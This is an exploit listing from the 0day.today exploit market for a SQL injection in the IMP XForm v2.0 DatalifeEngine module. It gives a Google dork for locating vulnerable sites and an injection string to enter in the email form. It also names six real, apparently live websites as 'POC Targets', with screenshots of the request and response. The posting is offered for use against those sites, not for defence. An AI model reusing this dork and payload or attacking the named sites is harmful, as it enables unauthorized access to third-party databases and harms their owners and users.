[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IMP XForm 2.0 DatalifeEngine SQL Injection Vulnerability

Author
Hesam Bazvand
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30169
Category
web applications
Date add
12-04-2018
Platform
php
# Exploit Title: IMP XForm v2.0 DatalifeEngine Module SQL Injection
# Exploit Author: Hesam Bazvand
# Software Link: http://www.datalifeengine.ir/download/1396/IMP.XForm.v2.0.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : inurl:xform/1.html OR inurl:xform/2.html and etc...
# Email : Black.king066@gmail.com

  Exploit : Insert '"1 In Email Form and Enjoy It :D
  
  Request : https://i.imgur.com/6MjOoYF.jpg
  
  Response : https://i.imgur.com/Pbsr5iq.jpg
  
  POC Targets : 
  http://payamclub.ir/xform/1.html
  http://p-it.ir/xform/1.html
  http://www.dlestore.ir/xform/2.html
  http://www.muslimstudents.ir/xform/2.html
  http://bandarabadan10000.ir/xform/1.html
  http://www.ghaem125.ir/xform/1.html

#  0day.today [2024-12-26]  #